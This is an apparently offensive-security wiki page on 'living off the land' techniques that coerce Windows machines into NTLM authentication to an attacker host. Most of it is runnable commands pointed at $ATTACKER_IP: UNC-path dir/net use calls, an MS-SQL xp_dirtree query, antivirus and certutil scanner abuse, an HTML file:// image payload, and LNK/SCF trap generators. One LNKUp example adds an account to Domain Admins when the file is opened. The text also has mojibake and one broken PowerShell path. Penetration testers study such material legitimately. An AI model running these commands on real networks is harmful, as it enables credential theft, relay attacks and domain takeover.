Skip to content

๐Ÿ› ๏ธ Living off the land โ€‹

This is a work-in-progress. It's indicated with the ๐Ÿ› ๏ธ emoji in the page name or in the category name

Theory โ€‹

In the physical world, โ€œliving off the landโ€ simply means to survive only by the resources that you can harvest from the natural land. There may be multiple reasons for doing this โ€” perhaps you want to get โ€œoff the grid,โ€ or maybe you have something or someone to hide from. Or maybe you just like the challenge of being self-sufficient.

In the technology world, โ€œliving off the landโ€ (LotL) refers to attacker behavior that uses tools or features that already exist in the target environment. (source)

There are multiple "living off the land" techniques that can be used to force authentications, to capture hashes, or to relay authentications. In order to use those techniques, testers need to have an initial access to "the land", i.e. the tools or features the technique uses.

Practice โ€‹

Those techniques will usually generate outgoing traffic on SMB or HTTP, hence requiring the attacker to set up an SMB or HTTP server to capture or relay the authentication (e.g. using tools like Responder (Python), Inveigh (Powershell), ntlmrelayx (Python) or Inveigh-Relay (Powershell)).

Command execution โ€‹

On Windows machines, cmdlets like net or dir can be used to make the machine access a remote resource, hence making it authenticate. This leads to an outgoing traffic using SMB.

bash
dir \\$ATTACKER_IP\something
net use \\$ATTACKER_IP\something

The rpcping command can also be used to trigger an authentication. The perk of this technique is that the auth won't carry a signing negotiation flag, hence allowing for relays

MS-SQL queries execution โ€‹

On MS-SQL (Microsoft SQL) servers, the EXEC method can be used to access a remote SMB share. This leads to an outgoing traffic using SMB.

bash
EXEC master.sys.xp_dirtree '\\$ATTACKER_IP\something',1,1

File explorer โ€‹

On Windows machines, the file explorer can be used to access remote resources like SMB shares by supplying its UNC path (i.e. \\$ATTACKER_IP\something) in the research bar. This leads to an outgoing traffic using SMB.

Internet browser โ€‹

Internet browsers can access HTTP servers by supplying their URL (i.e. http://$IP:$PORT/something) in the research bar. This technique is rarely used as it can pop up a prompt. This leads to an outgoing traffic using HTTP.

HTML documents / XSS โ€‹

HTML documents can be crafted (or injected with content when successfully exploiting an HTML injection attack such as an Cross-Site Scripting) in way that could make browsers authenticate when accessing a remote resource. This leads to an outgoing traffic using SMB.

![](file://$ATTACKER_IP/something/something.png)

Web server file inclusion โ€‹

https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/

Windows Defender Remote Scanning โ€‹

bash
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\$ATTACKER_IP\file.txt

Certutil โ€‹

bash
certutil.exe -syncwithWU \\$ATTACKER_IP\share

Trend Micro Remote Scanning โ€‹

bash
C:\Program Files (x86)\Trend Micro\OfficeScan Clien\PccNt.exe \\$ATTACKER_IP\s\

Shortcut files (scf, lnk, url) โ€‹

SMB shares can be trapped with shortcut files that will automatically be handled by Windows' file explorer (e.g. a URL shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary). This leads to an outgoing traffic using SMB.

Shares an account has WRITE privileges over can be mapped with smbmap (Python).

bash
smbmap -d "domain" -u "user" -p "password" --host-file targets.txt

Shortcut file names can be preprended with a @ symbol to put them on top of the share, to make sure the file explorer has to parse it.

The ntlm_theft (Python) tool can be used to generate multiple file types at once (lnk, scf, url, docx, xslx, htm, xml, pdf, ...).

bash
ntlm_theft.py --generate all --server $ATTACKER_IP --filename "@FILENAME"

An LNK shortcut using an icon file located on a remote SMB share will be parsed by the file explorer that will request the icon file and authenticate if necessary.

Shortcuts with the .lnk extension have a lot of beneficial properties when it comes to stealth; they are an exception from the Windows setting to show or hide file extensions. Even when โ€œhide known file extensionsโ€ is disabled, explorer.exe will only show the name, allowing us to let it end in โ€œ.jpegโ€. A major downside is that they only allow 1024 characters for the whole command they execute. (source)

LNKUp (Python) is a great tool to generate malicious LNK shortcuts. They can be set with a remote icon file to generate outgoing SMB traffic and authentications but can also be set to execute commands when opened (i.e. double-clicked).

bash
# Simple SMB trap with remote icon file
LNKUp.py --host $ATTACKER_IP --type ntlm --output '@CONFIDENTIAL-ACCOUNTS.txt.lnk'

# SMB trap + command execution
LNKUp.py --host $ATTACKER_IP --type ntlm --output '@CONFIDENTIAL-ACCOUNTS.txt.lnk' --execute "net group 'Domain Admins' Pentester01 /domain /add"
bash
# Simple SMB trap with remote icon file (Powershell)
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\Windows\temp\@Salaries-2023.lnk")
$lnk.TargetPath = "\\\@icon.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Salaries-2023."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Advanced traps

NetExec (Python) can be used to automatically push LNK files to a writeable share.

bash
# Creation & upload
nxc smb "target" -d "domain" -u "user" -p "password" -M slinky -O NAME="SHARE" SERVER="ATTACKER_IP"

# Cleanup
nxc smb "target" -d "domain" -u "user" -p "password" -M slinky -O NAME="SHARE" SERVER="ATTACKER_IP" CLEANUP=True

PDF documents โ€‹

https://github.com/deepzec/Bad-Pdf

https://github.com/3gstudent/Worse-PDF

RTF documents โ€‹

MS Word documents โ€‹

Lock screen wallpaper โ€‹

https://github.com/nccgroup/Change-Lockscreen

https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation

Resources โ€‹

https://hatching.io/blog/lnk-hta-polyglot/

https://logrhythm.com/blog/what-are-living-off-the-land-attacks/

https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/

https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

https://github.com/Gl3bGl4z/All_NTLM_leak

https://mgp25.com/research/infosec/Leaking-NTLM-hashes/

https://www.securify.nl/blog/living-off-the-land-stealing-netntlm-hashes#office

https://www.ired.team/offensive-security/initial-access

https://github.com/mdsecactivebreach/Farmer